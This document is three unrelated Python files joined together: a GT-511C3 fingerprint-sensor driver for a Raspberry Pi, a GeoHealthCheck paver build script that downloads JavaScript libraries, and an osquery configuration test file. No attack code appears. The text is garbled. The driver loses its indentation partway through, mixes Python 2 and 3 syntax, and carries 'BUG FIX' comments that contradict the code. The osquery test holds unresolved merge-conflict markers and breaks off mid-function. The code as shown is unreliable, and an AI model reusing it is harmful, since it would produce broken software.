This code has been tested on a Raspberry Pi 2 B, however, will in finality be used with a Raspberry Pi
Zero, so code has been designed to work with both of these.
This inherits majorly from Jean Machuca's attempts to do the same - please look at his library as well
'''
'''
Connections are as follows:
FP (Fingerprint Sensor) TX - RXD of Raspberry Pi GPIO
FP (Fingerprint Sensor) RX - TXD of Raspberry Pi GPIO
VCC of Fingerprint Sensor - 3V3 of Raspberry Pi GPIO
GND of Fingerprint Sensor - GND of Raspberry Pi GPIO
'''
import os
import serial
import time
import binascii
def delay(seconds):
    """Sleep for *seconds*.

    Thin wrapper kept so code lifted from the SparkFun Arduino library reads
    the same. Despite the Arduino ``delay(ms)`` convention, every caller in
    this module passes seconds (e.g. ``delay(0.1)``) and ``time.sleep`` takes
    seconds, so the parameter was renamed from the misleading
    ``milliseconds``.
    """
    time.sleep(seconds)
# Default serial device path (a USB-serial adapter, e.g. on OS X — not the
# Pi's on-board UART, which is /dev/ttyAMA0; see connect()).
deviceName = '/dev/cu.usbserial-A601EQ14'
class packet:
    """Base class for GT-511C3 protocol packets.

    Holds the fixed start-code / device-id bytes and the byte-twiddling
    helpers shared by command and response packets.
    """
    byte1 = 0x55        # start code 1
    byte2 = 0xAA        # start code 2
    bytedevid1 = 0x01   # device id, low byte
    bytedevid2 = 0x00   # device id, high byte
    def returnHighByte(self, word):
        """Return the most significant byte of a 16-bit word."""
        # BUG FIX: the original body referenced an undefined name ``w``.
        return (word >> 8) & 0x00FF
    def returnLowByte(self, word):
        """Return the least significant byte of a 16-bit word."""
        return word & 0x00FF
    # Compatibility aliases: subclasses in this module call these names
    # (commandpacket.GetPacketBytes, Response_Packet.__init__).
    GetHighByte = returnHighByte
    GetLowByte = returnLowByte
    def CalculateCheckSum(self, bytearr):
        """Additive checksum: the sum of all byte values in *bytearr*."""
        # Iterating a bytearray yields ints on both Python 2 and 3; the old
        # map(ord, bytes(...)) form broke on Python 3.
        return sum(bytearray(bytearr))
    def serializeToSend(self, bytearr):
        """Hex-dump *bytearr* as space-separated two-digit hex bytes."""
        return ' '.join('%02x' % b for b in bytearray(bytearr))
class commandpacket(packet):
    """Command packet sent to the GT-511C3 (12 bytes on the wire)."""
    cmd = ''
    command = bytearray(2)      # little-endian encoding of ``cmd``
    UseSerialDebug = True
    Parameter = bytearray(4)    # little-endian 32-bit command parameter
    # Command opcodes from the GT-511C3 datasheet.
    commands = {
        'NotSet' : 0x00, # Default value for enum. Scanner will return error if sent this.
        'Open' : 0x01, # Open Initialization
        'Close' : 0x02, # Close Termination
        'UsbInternalCheck' : 0x03, # UsbInternalCheck Check if the connected USB device is valid
        'ChangeBaudrate' : 0x04, # ChangeBaudrate Change UART baud rate
        'SetIAPMode' : 0x05, # SetIAPMode Enter IAP Mode In this mode, FW Upgrade is available
        'CmosLed' : 0x12, # CmosLed Control CMOS LED
        'GetEnrollCount' : 0x20, # Get enrolled fingerprint count
        'CheckEnrolled' : 0x21, # Check whether the specified ID is already enrolled
        'EnrollStart' : 0x22, # Start an enrollment
        'Enroll1' : 0x23, # Make 1st template for an enrollment
        'Enroll2' : 0x24, # Make 2nd template for an enrollment
        'Enroll3' : 0x25, # Make 3rd template for an enrollment, merge three templates into one template, save merged template to the database
        'IsPressFinger' : 0x26, # Check if a finger is placed on the sensor
        'DeleteID' : 0x40, # Delete the fingerprint with the specified ID
        'DeleteAll' : 0x41, # Delete all fingerprints from the database
        'Verify1_1' : 0x50, # Verification of the capture fingerprint image with the specified ID
        'Identify1_N' : 0x51, # Identification of the capture fingerprint image with the database
        'VerifyTemplate1_1' : 0x52, # Verification of a fingerprint template with the specified ID
        'IdentifyTemplate1_N' : 0x53, # Identification of a fingerprint template with the database
        'CaptureFinger' : 0x60, # Capture a fingerprint image(256x256) from the sensor
        'MakeTemplate' : 0x61, # Make template for transmission
        'GetImage' : 0x62, # Download the captured fingerprint image(256x256)
        'GetRawImage' : 0x63, # Capture & Download raw fingerprint image(320x240)
        'GetTemplate' : 0x70, # Download the template of the specified ID
        'SetTemplate' : 0x71, # Upload the template of the specified ID
        'GetDatabaseStart' : 0x72, # Start database download, obsolete
        'GetDatabaseEnd' : 0x73, # End database download, obsolete
        'UpgradeFirmware' : 0x80, # Not supported
        'UpgradeISOCDImage' : 0x81, # Not supported
        'Ack' : 0x30, # Acknowledge.
        'Nack' : 0x31 # Non-acknowledge
    }
    def __init__(self, *args, **kwargs):
        """Look up the opcode for *commandName* (args[0])."""
        commandName = args[0]
        kwargs.setdefault('UseSerialDebug', True)
        self.UseSerialDebug = kwargs['UseSerialDebug']
        if self.UseSerialDebug:
            # print() form parses on both Python 2 and 3
            print('Command: %s' % commandName)
        self.cmd = self.commands[commandName]
    def GetPacketBytes(self):
        """Assemble the 12-byte wire format:
        start codes, device id, parameter, command, checksum.
        """
        # BUG FIX: the original called undefined self.GetLowByte/GetHighByte
        # and undefined COMMAND_START_CODE_* / COMMAND_DEVICE_ID_* constants.
        self.command[0] = self.cmd & 0x00FF
        self.command[1] = (self.cmd >> 8) & 0x00FF
        packetbytes = bytearray(12)
        packetbytes[0] = self.byte1
        packetbytes[1] = self.byte2
        packetbytes[2] = self.bytedevid1
        packetbytes[3] = self.bytedevid2
        packetbytes[4] = self.Parameter[0]
        packetbytes[5] = self.Parameter[1]
        packetbytes[6] = self.Parameter[2]
        packetbytes[7] = self.Parameter[3]
        packetbytes[8] = self.command[0]
        packetbytes[9] = self.command[1]
        # Checksum covers bytes 0..9 inclusive; the original sliced [0:9]
        # and silently dropped the command high byte.
        chksum = sum(packetbytes[0:10])
        packetbytes[10] = chksum & 0x00FF
        packetbytes[11] = (chksum >> 8) & 0x00FF
        return packetbytes
    def ParameterFromInt(self, i):
        """Store a 32-bit integer parameter in little-endian byte order."""
        self.Parameter[0] = i & 0x000000ff
        self.Parameter[1] = (i & 0x0000ff00) >> 8
        self.Parameter[2] = (i & 0x00ff0000) >> 16
        self.Parameter[3] = (i & 0xff000000) >> 24
# Alias matching the name used by fingerprintseonsor (and the upstream
# library): those methods instantiate ``Command_Packet``.
Command_Packet = commandpacket
class Response_Packet(packet):
    '''
    Response Packet Class

    Parses the 12-byte acknowledge/response packet returned by the scanner.
    BUG FIX: the base class was spelled ``Packet`` (undefined); the base in
    this module is lowercase ``packet``.
    '''
    # Error codes from the GT-511C3 datasheet.
    errors = {
        'NO_ERROR' : 0x0000, # Default value. no error
        'NACK_TIMEOUT' : 0x1001, # Obsolete, capture timeout
        'NACK_INVALID_BAUDRATE' : 0x1002, # Obsolete, Invalid serial baud rate
        'NACK_INVALID_POS' : 0x1003, # The specified ID is not between 0~199
        'NACK_IS_NOT_USED' : 0x1004, # The specified ID is not used
        'NACK_IS_ALREADY_USED' : 0x1005, # The specified ID is already used
        'NACK_COMM_ERR' : 0x1006, # Communication Error
        'NACK_VERIFY_FAILED' : 0x1007, # 1:1 Verification Failure
        'NACK_IDENTIFY_FAILED' : 0x1008, # 1:N Identification Failure
        'NACK_DB_IS_FULL' : 0x1009, # The database is full
        'NACK_DB_IS_EMPTY' : 0x100A, # The database is empty
        'NACK_TURN_ERR' : 0x100B, # Obsolete, Invalid order of the enrollment (The order was not as: EnrollStart -> Enroll1 -> Enroll2 -> Enroll3)
        'NACK_BAD_FINGER' : 0x100C, # Too bad fingerprint
        'NACK_ENROLL_FAILED' : 0x100D, # Enrollment Failure
        'NACK_IS_NOT_SUPPORTED' : 0x100E, # The specified command is not supported
        'NACK_DEV_ERR' : 0x100F, # Device Error, especially if Crypto-Chip is trouble
        'NACK_CAPTURE_CANCELED' : 0x1010, # Obsolete, The capturing is canceled
        'NACK_INVALID_PARAM' : 0x1011, # Invalid parameter
        'NACK_FINGER_IS_NOT_PRESSED' : 0x1012, # Finger is not pressed
        'INVALID' : 0XFFFF # Used when parsing fails
    }
    _lastBuffer = bytes()
    RawBytes = bytearray(12)
    ParameterBytes = bytearray(4)
    ResponseBytes = bytearray(2)
    ACK = False
    Error = None
    UseSerialDebug = True
    def __init__(self, _buffer=None, UseSerialDebug=False):
        '''
        creates and parses a response packet from the finger print scanner
        '''
        self.UseSerialDebug = UseSerialDebug
        if _buffer is not None:
            self.RawBytes = _buffer
            self._lastBuffer = bytes(_buffer)
            if self.UseSerialDebug:
                # print() form parses on both Python 2 and 3
                print('readed: %s' % self.serializeToSend(_buffer))
            if len(_buffer) >= 12:
                # Byte 8 is the response code: 0x30 == Ack, 0x31 == Nack.
                self.ACK = _buffer[8] == 0x30
                self.ParameterBytes[0] = _buffer[4]
                self.ParameterBytes[1] = _buffer[5]
                self.ParameterBytes[2] = _buffer[6]
                self.ParameterBytes[3] = _buffer[7]
                self.ResponseBytes[0] = _buffer[8]
                self.ResponseBytes[1] = _buffer[9]
                # BUG FIX: was self.GetHighByte/GetLowByte, which did not
                # exist on the (undefined) base class.
                self.Error = self.ParseFromBytes(self.returnHighByte(_buffer[5]), self.returnLowByte(_buffer[4]))
    def ParseFromBytes(self, high, low):
        '''
        parses bytes into one of the possible errors from the finger print scanner
        '''
        e = 'INVALID'
        if high == 0x01:
            # Reverse lookup of the error name. Iterating items() works on
            # Python 2 and 3 (dict.values().index() is Python-2-only); codes
            # are unique, so the result matches the original behavior.
            for name, code in self.errors.items():
                if code == low:
                    e = name
                    break
        return e
    def IntFromParameter(self):
        """Little-endian 32-bit integer from the four parameter bytes."""
        retval = 0
        retval = (retval << 8) + self.ParameterBytes[3]
        retval = (retval << 8) + self.ParameterBytes[2]
        retval = (retval << 8) + self.ParameterBytes[1]
        retval = (retval << 8) + self.ParameterBytes[0]
        return retval
class SerialCommander:
    """Helpers for (de)serializing byte buffers sent over the serial line."""
    def __serialize_args_hex__(self, *arg, **kwargs):
        # Pack the keyword-argument values, in order, into a byte string.
        values = [v for v in kwargs.values()]
        return bytes(bytearray(values))
    def serializeToSend(self, bytearr):
        # Space-separated hex dump of the buffer, e.g. '55 aa 01 00'.
        raw = bytes(bytearr)
        return ' '.join(binascii.hexlify(ch) for ch in raw)
    def unserializeFromRead(self, char_readed, bytearr):
        # Accumulate one value read from the wire onto the running buffer.
        bytearr.append(char_readed)
        return bytearr
def connect(device_name=None, baud=None, timeout=None, is_com=True):
    """Open the serial connection to the scanner.

    Returns an open ``serial.Serial`` instance, or None if the port could
    not be opened. The original body unconditionally clobbered every caller
    argument, referenced the undefined name ``false`` (NameError on every
    call) and never opened anything; arguments now fall back to the Pi
    defaults only when omitted.
    """
    if device_name is None:
        device_name = '/dev/ttyAMA0'  # Raspberry Pi on-board UART
    if baud is None:
        baud = 9600
    if timeout is None:
        timeout = 2000  # NOTE(review): pyserial timeouts are seconds — 2000 looks like ms; confirm
    try:
        _ser = serial.Serial(device_name, baudrate=baud, timeout=timeout)
    except Exception as exc:
        # Best-effort: callers (fingerprintseonsor.__init__) test for None.
        print('Could not open %s: %s' % (device_name, exc))
        _ser = None
    return _ser
BAUD = 9600
class fingerprintseonsor(SerialCommander):
_serial = None
_lastResponse = None
_device_name = None
_baud = None
_timeout= None
UseSerialDebug = True
    def __init__(self,device_name=None,baud=None,timeout=None,is_com=True):
        """Open the serial link via the module-level connect() and, on
        success, initialise the scanner with Open()."""
        self._device_name = device_name
        self._baud=baud
        self._timeout = timeout
        # connect() is the module-level helper defined above this class.
        self._serial = connect(device_name,baud,timeout,is_com=is_com)
        if not self._serial is None:
            # Give the scanner a moment before the first command.
            delay(0.1)
            self.Open()
        elif self.UseSerialDebug:
            print 'No connection with this device:- %s' % self._device_name
    def Open(self):
        """Send the Open (initialisation) command; returns the ACK flag.

        NOTE(review): ``Command_Packet`` is not defined in this module (the
        command class is named ``commandpacket``), so this raises NameError
        as written — confirm the intended class name. ChangeBaudRate /
        SendCommand / GetResponse are presumably defined later in the class.
        """
        self.ChangeBaudRate(BAUD)
        delay(0.1)
        cp = Command_Packet('Open',UseSerialDebug=self.UseSerialDebug)
        # Parameter 1 requests extra device info in the response.
        cp.ParameterFromInt(1)
        packetbytes = cp.GetPacketBytes()
        self.SendCommand(packetbytes, 12)
        rp = self.GetResponse()
        del packetbytes
        return rp.ACK
def Close(self):
cp = Command_Packet('Close',UseSerialDebug=self.UseSerialDebug)
cp.Parameter[0] = 0x00;
cp.Parameter[1] = 0x00;
cp.Parameter[2] = 0x00;
cp.Parameter[3] = 0x00;
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
if not self._serial is None:
self._serial.close()
del packetbytes
return rp.ACK
def SetLED(self,on=True):
cp = Command_Packet('CmosLed',UseSerialDebug=self.UseSerialDebug)
cp.Parameter[0] = 0x01 if on else 0x00;
cp.Parameter[1] = 0x00;
cp.Parameter[2] = 0x00;
cp.Parameter[3] = 0x00;
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
return retval
def CheckEnrolled(self,ID):
cp = Command_Packet('CheckEnrolled',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.ACK
del rp
return retval
def EnrollStart(self,ID):
cp = Command_Packet('EnrollStart',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_DB_IS_FULL']:
retval = 1
elif rp.Error == rp.errors['NACK_INVALID_POS']:
retval = 2
elif rp.Error == rp.errors['NACK_IS_ALREADY_USED']:
retval = 3
del rp
return retval
def Enroll1(self):
cp = Command_Packet('Enroll1',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def Enroll2(self):
cp = Command_Packet('Enroll2',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def Enroll3(self):
cp = Command_Packet('Enroll3',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
del cp
self.SendCommand(packetbytes, 12)
del packetbytes
rp = self.GetResponse()
retval = rp.IntFromParameter()
retval = 3 if retval < 200 else 0
if not rp.ACK:
if rp.Error == rp.errors['NACK_ENROLL_FAILED']:
retval = 1
elif rp.Error == rp.errors['NACK_BAD_FINGER']:
retval = 2
return 0 if rp.ACK else retval
def IsPressFinger(self):
cp = Command_Packet('IsPressFinger',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
pval = rp.ParameterBytes[0]
pval += rp.ParameterBytes[1]
pval += rp.ParameterBytes[2]
pval += rp.ParameterBytes[3]
retval = True if pval == 0 else False
del rp
del packetbytes
del cp
return retval
def DeleteID(self,ID):
cp = Command_Packet('DeleteID',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(ID)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
del cp
return retval
def Identify1_N(self):
cp = Command_Packet('Identify1_N',UseSerialDebug=self.UseSerialDebug)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.IntFromParameter()
if retval > 200:
retval = 200
del rp
del packetbytes
del cp
return retval
def CaptureFinger(self,highquality=True):
cp = Command_Packet('CaptureFinger',UseSerialDebug=self.UseSerialDebug)
cp.ParameterFromInt(1 if highquality else 0)
packetbytes = cp.GetPacketBytes()
self.SendCommand(packetbytes, 12)
rp = self.GetResponse()
retval = rp.ACK
del rp
del packetbytes
del cp
return retval
    def GetTemplate(self, ID):
        '''
        Gets a template from the fps (498 bytes) in 4 Data_Packets
        Use StartDataDownload, and then GetNextDataPacket until done
        Parameter: 0-199 ID number
        Returns:
            0 - ACK Download starting
            1 - Invalid position
            2 - ID not used (no template to download)
        '''
        cp = Command_Packet('GetTemplate',UseSerialDebug=self.UseSerialDebug)
        cp.ParameterFromInt(ID)
        packetbytes = cp.GetPacketBytes()
        self.SendCommand(packetbytes, 12)
        rp = self.GetResponse()
        # Map NACK error codes onto the documented return values.
        retval = 0
        if not rp.ACK:
            if rp.Error == rp.errors['NACK_INVALID_POS']:
                retval = 1
            elif rp.Error == rp.errors['NACK_IS_NOT_USED']:
                retval = 2
        return retval
| |
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import glob
import os
import shutil
import tempfile
from StringIO import StringIO
from urllib2 import urlopen
import zipfile
from paver.easy import (Bunch, call_task, cmdopts, info, options,
path, pushd, sh, task)
BASEDIR = os.path.abspath(os.path.dirname(__file__))

# Paver option bundle: the canonical project paths used by the tasks below.
options(
    base=Bunch(
        home=path(BASEDIR),
        docs=path('%s/docs' % BASEDIR),
        instance=path('%s/instance' % BASEDIR),
        pot=path('%s/GeoHealthCheck/translations/en/LC_MESSAGES/messages.po' %
                 BASEDIR),
        static_docs=path('%s/GeoHealthCheck/static/docs' % BASEDIR),
        static_lib=path('%s/GeoHealthCheck/static/lib' % BASEDIR),
        tmp=path(tempfile.mkdtemp()),  # scratch dir, removed by clean()
        translations=path('%s/GeoHealthCheck/translations' % BASEDIR)
    ),
)
@task
def setup():
    """setup plugin dependencies

    Creates instance/data dirs, copies the default config, installs pip
    requirements, downloads the admin skin and JS libraries into
    static/lib, compiles translations and builds the local docs.
    """
    config_file = options.base.home / 'GeoHealthCheck/config_main.py'
    config_site = options.base.instance / 'config_site.py'
    # setup dirs
    if not os.path.exists(options.base.static_lib):
        options.base.static_lib.mkdir()
    if not os.path.exists(options.base.instance):
        options.base.instance.mkdir()
        data_dir = options.base.instance / 'data'
        data_dir.mkdir()
        # data_dir.chmod(0777) gives failure on Python 2.7 Paver 1.2.1
        os.chmod(path(data_dir), 0o777)
    # setup config
    config_file.copy(config_site)
    # setup deps
    sh('pip install -r requirements.txt')
    skin = 'http://github.com/BlackrockDigital/startbootstrap-sb-admin-2/archive/v3.3.7+1.zip'  # noqa
    skin_dirs = ['dist', 'vendor']
    need_to_fetch = False
    for skin_dir in skin_dirs:
        skin_dir_path = os.sep.join(
            ['startbootstrap-sb-admin-2-3.3.7-1', skin_dir])
        if not os.path.exists(skin_dir_path):
            need_to_fetch = True
    if need_to_fetch:
        zipstr = StringIO(urlopen(skin).read())
        zipfile_obj = zipfile.ZipFile(zipstr)
        zipfile_obj.extractall(options.base.static_lib)
        for zf_mem in skin_dirs:
            src_loc = path(options.base.static_lib /
                           'startbootstrap-sb-admin-2-3.3.7-1' / zf_mem)
            dest_loc = path(options.base.static_lib / zf_mem)
            if not os.path.exists(dest_loc):
                src_loc.move(dest_loc)
            else:
                info('directory already exists. Skipping')
        shutil.rmtree(path(options.base.static_lib /
                           'startbootstrap-sb-admin-2-3.3.7-1'))
    # install sparklines to static/site/js
    with open(path(options.base.static_lib / 'jspark.js'), 'w') as f:
        content = urlopen('http://ejohn.org/files/jspark.js').read()
        # Bug fix: str.replace returns a new string; the original discarded
        # the result, so the unmodified file was written out.
        content = content.replace('red', 'green')
        f.write(content)
    # install bootstrap-tagsinput to static/lib
    info('Getting select2')
    select2 = 'https://github.com/select2/select2/archive/4.0.3.zip'
    zipstr = StringIO(urlopen(select2).read())
    zipfile_obj = zipfile.ZipFile(zipstr)
    zipfile_obj.extractall(options.base.static_lib)
    dirname = glob.glob(options.base.static_lib / 'select2-*')[0]
    dstdir = ''.join(dirname.rsplit('-', 1)[:-1])
    try:
        os.rename(dirname, dstdir)
    except OSError:
        # Destination exists from a previous run: replace it.
        shutil.rmtree(dstdir)
        os.rename(dirname, dstdir)
    # install leafletjs to static/lib
    info('Getting leaflet')
    leafletjs = 'http://cdn.leafletjs.com/downloads/leaflet-0.7.5.zip'
    zipstr = StringIO(urlopen(leafletjs).read())
    zipfile_obj = zipfile.ZipFile(zipstr)
    zipfile_obj.extractall(options.base.static_lib / 'leaflet')
    # install html5shiv to static/lib
    with open(path(options.base.static_lib / 'html5shiv.min.js'), 'w') as f:
        url = 'http://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js'
        content = urlopen(url).read()
        f.write(content)
    # install respond to static/lib
    with open(path(options.base.static_lib / 'respond.min.js'), 'w') as f:
        url = 'http://oss.maxcdn.com/respond/1.4.2/respond.min.js'
        content = urlopen(url).read()
        f.write(content)
    # build i18n .mo files
    call_task('compile_translations')
    # build local docs
    call_task('refresh_docs')
    # message user
    info('GeoHealthCheck is now built. Edit settings in %s' % config_site)
    info('before deploying the application. Alternatively, you can start a')
    info('development instance with "python GeoHealthCheck/app.py"')
@task
def create_secret_key():
    """create secret key for SECRET_KEY in instance/config_site.py"""
    # NOTE: str.encode('hex') is Python 2 only; use binascii.hexlify when
    # porting to Python 3.
    info('Secret key: \'%s\'' % os.urandom(24).encode('hex'))
    info('Copy/paste this key to set the SECRET_KEY')
    info('value in instance/config_site.py')
@task
@cmdopts([
    ('email=', 'e', 'email'),
    ('username=', 'u', 'username'),
    ('password=', 'p', 'password')
])
def create(options):
    """create database objects and superuser account"""
    username = options.get('username', None)
    password = options.get('password', None)
    email = options.get('email', None)
    # Only pass credentials through when all three were supplied.
    credentials = ''
    if all([username, password, email]):
        credentials = ' '.join([username, password, email])
    sh('python %s create %s' % (path('GeoHealthCheck/models.py'), credentials))
@task
@cmdopts([
    ('password=', 'p', 'password')
])
def create_hash(options):
    """
    Create hash, mainly for passwords.
    Usage: paver create_hash -p mypass
    """
    import sys
    # Make the package importable when running from the repo root.
    sys.path.insert(0, BASEDIR)
    from GeoHealthCheck.util import create_hash
    token = create_hash(options.get('password', None))
    info('Copy/paste the entire token below for example to set password')
    info(token)
@task
def upgrade():
    """upgrade database if changed; be sure to backup first!"""
    info('Upgrading database...')
    # Run the Flask-Migrate upgrade from inside the package directory.
    with pushd(path('%s/GeoHealthCheck' % BASEDIR)):
        sh('python manage.py db upgrade')
@task
def create_wsgi():
    """create WSGI wrapper and Apache2 configuration"""
    instance = options.base.instance
    wsgi_script = '%s%sGeoHealthCheck.wsgi' % (instance, os.sep)
    with open(wsgi_script, 'w') as fh:
        fh.write('import sys\n')
        fh.write('sys.path.insert(0, \'%s\')\n' % BASEDIR)
        fh.write('from GeoHealthCheck.app import APP as application')
    wsgi_conf = '%s%sGeoHealthCheck.conf' % (instance, os.sep)
    with open(wsgi_conf, 'w') as fh:
        fh.writelines([
            'WSGIScriptAlias / %s%sGeoHealthCheck.wsgi\n' % (instance, os.sep),
            '<Directory %s%s>\n' % (BASEDIR, os.sep),
            'Order deny,allow\n',
            'Allow from all\n',
            '</Directory>',
        ])
@task
def refresh_docs():
    """Build sphinx docs from scratch"""
    make = sphinx_make()
    # Drop any previously published copy before rebuilding.
    if os.path.exists(options.base.static_docs):
        shutil.rmtree(options.base.static_docs)
    with pushd(options.base.docs):
        sh('%s clean' % make)
        sh('%s html' % make)
        # Publish the fresh HTML into the app's static dir.
        source_html_dir = path('%s/docs/_build/html' % BASEDIR)
        source_html_dir.copytree(options.base.static_docs)
@task
def clean():
    """clean environment"""
    # Remove generated artefacts (same order as before).
    for target in (options.base.static_lib,
                   options.base.tmp,
                   options.base.static_docs):
        if os.path.exists(target):
            shutil.rmtree(target)
@task
def extract_translations():
    """extract translations wrapped in _() or gettext()"""
    # Ensure the English catalogue directory exists before extraction.
    pot_dir = path('GeoHealthCheck/translations/en/LC_MESSAGES')
    if not os.path.exists(pot_dir):
        pot_dir.makedirs()
    sh('pybabel extract -F babel.cfg -o %s GeoHealthCheck' % options.base.pot)
@task
@cmdopts([
    ('lang=', 'l', '2-letter language code'),
])
def add_language_catalogue(options):
    """adds new language profile"""
    lang = options.get('lang', None)
    if lang is None:
        raise RuntimeError('missing lang argument')
    # Initialise a new catalogue from the English .po template.
    sh('pybabel init -i %s -d %s -l %s' % (
        options.base.pot, options.base.translations, lang))
@task
def compile_translations():
    """build .mo files"""
    sh('pybabel compile -d %s' % options.base.translations)
@task
def update_translations():
    """update language strings"""
    # Re-extract from source, then merge into the existing catalogues.
    call_task('extract_translations')
    sh('pybabel update -i %s -d %s' % (
        options.base.pot, options.base.translations))
@task
def runner_daemon():
    """Run the HealthCheck runner daemon scheduler"""
    sh('python %s' % path('GeoHealthCheck/scheduler.py'))
@task
def run_healthchecks():
    """Run all HealthChecks directly"""
    sh('python %s' % path('GeoHealthCheck/healthcheck.py'))
def sphinx_make():
    """return what command Sphinx is using for make"""
    # Windows ships a batch wrapper; everywhere else plain make is used.
    return 'make.bat' if os.name == 'nt' else 'make'
| |
#!/usr/bin/env python
# Copyright (c) 2014-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pyexpect.replwrap will not work with unicode_literals
# from __future__ import unicode_literals
import os
import random
import unittest
# osquery-specific testing utils
import test_base
SHELL_TIMEOUT = 10       # timeout passed to TimeoutRunner (presumably seconds)
EXIT_CATASTROPHIC = 78   # expected exit code for a catastrophic failure
class OsqueryiTest(unittest.TestCase):
    def setUp(self):
        # Path to the osqueryi binary inside the build tree.
        self.binary = os.path.join(test_base.ARGS.build, "osquery", "osqueryi")
        self.osqueryi = test_base.OsqueryWrapper(self.binary)
        # Randomised database path so repeated runs do not collide.
        self.dbpath = "%s%s" % (
            test_base.CONFIG["options"]["database_path"],
            str(random.randint(1000, 9999)))
    def test_error(self):
        '''Test that we throw an error on bad query'''
        self.osqueryi.run_command(' ')  # flush any pending shell output first
        self.assertRaises(test_base.OsqueryException,
                          self.osqueryi.run_query, 'foo')
@test_base.flaky
def test_config_check_success(self):
'''Test that a 0-config passes'''
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=%s/test.config" % test_base.SCRIPT_DIR
],
<<<<<<< HEAD
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print(proc.stdout)
print(proc.stderr)
=======
SHELL_TIMEOUT)
self.assertEqual(proc.stdout, "")
print(proc.stdout)
print(proc.stderr)
self.assertEqual(proc.proc.poll(), 0)
@test_base.flaky
def test_config_dump(self):
'''Test that config raw output is dumped when requested'''
config = "%s/test_noninline_packs.conf" % test_base.SCRIPT_DIR
proc = test_base.TimeoutRunner([
self.binary,
"--config_dump",
"--config_path=%s" % config
],
SHELL_TIMEOUT)
content = ""
with open(config, 'r') as fh: content = fh.read()
self.assertEqual(proc.stdout, "{\"%s\": %s}\n" % (config, content))
print (proc.stderr)
>>>>>>> 769a723b5ccb97037b678a874480f37beb2281c6
self.assertEqual(proc.proc.poll(), 0)
@test_base.flaky
def test_config_check_failure_invalid_path(self):
'''Test that a missing config fails'''
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=/this/path/does/not/exist"
],
SHELL_TIMEOUT)
self.assertNotEqual(proc.stderr, "")
print(proc.stdout)
print(proc.stderr)
self.assertEqual(proc.proc.poll(), 1)
@test_base.flaky
def test_config_check_failure_valid_path(self):
# Now with a valid path, but invalid content.
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_path=%s/test.badconfig" % test_base.SCRIPT_DIR
],
SHELL_TIMEOUT)
self.assertEqual(proc.proc.poll(), 1)
self.assertNotEqual(proc.stderr, "")
@test_base.flaky
def test_config_check_failure_missing_plugin(self):
# Finally with a missing config plugin
proc = test_base.TimeoutRunner([
self.binary,
"--config_check",
"--database_path=%s" % (self.dbpath),
"--config_plugin=does_not_exist"
],
<<<<<<< HEAD
=======
SHELL_TIMEOUT)
self.assertNotEqual(proc.stderr, "")
self.assertNotEqual(proc.proc.poll(), 0)
# Also do not accept a SIGSEG
self.assertEqual(proc.proc.poll(), EXIT_CATASTROPHIC)
@test_base.flaky
def test_config_check_example(self):
'''Test that the example config passes'''
example_path = "deployment/osquery.example.conf"
